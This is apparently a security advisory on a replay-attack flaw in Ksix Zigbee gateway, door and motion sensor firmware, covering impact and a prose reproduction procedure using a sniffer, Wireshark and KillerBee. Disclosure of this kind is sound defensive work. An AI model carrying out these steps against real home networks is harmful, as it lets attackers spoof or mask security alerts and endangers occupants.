Ksix Zigbee Devices Replay Attack Vulnerability

A replay attack vulnerability exists in Ksix Zigbee smart home devices, including the Zigbee Gateway Module (v1.0.3), Door Sensor (v1.0.7), and Motion Sensor (v1.0.12). The vulnerability arises from an improper implementation of Zigbee's anti-replay mechanism, which is supposed to use a frame counter to prevent the resending of old packets. Instead, an attacker within wireless range can intercept and replay messages by increasing the sequence number, bypassing authentication and triggering false alerts through the associated mobile application.

Impact

Exploitation of this vulnerability allows for authentication bypass, enabling attackers to inject spoofed messages into the Zigbee network. This can cause false notifications to be sent to the user via the mobile app, simulating real activity such as opened doors or detected motion. Additionally, the vulnerability can disrupt normal device communication, causing sensors to appear online while they are actually unresponsive, potentially delaying responses to physical security breaches.

Reproduction

To reproduce this vulnerability, capture Zigbee traffic using a compatible sniffer device, such as an APImote or a TI CC2531, and save the data in a .pcap file. Open the file with Wireshark to find a packet that triggers a response from the device, like a 'door open' alert. After identifying the packet, modify its sequence number to a higher value, convert the file back to .pcap format, and use a tool like KillerBee to replay the packet into the Zigbee network. The device will accept the replayed message as legitimate, activating the corresponding alert in the mobile application.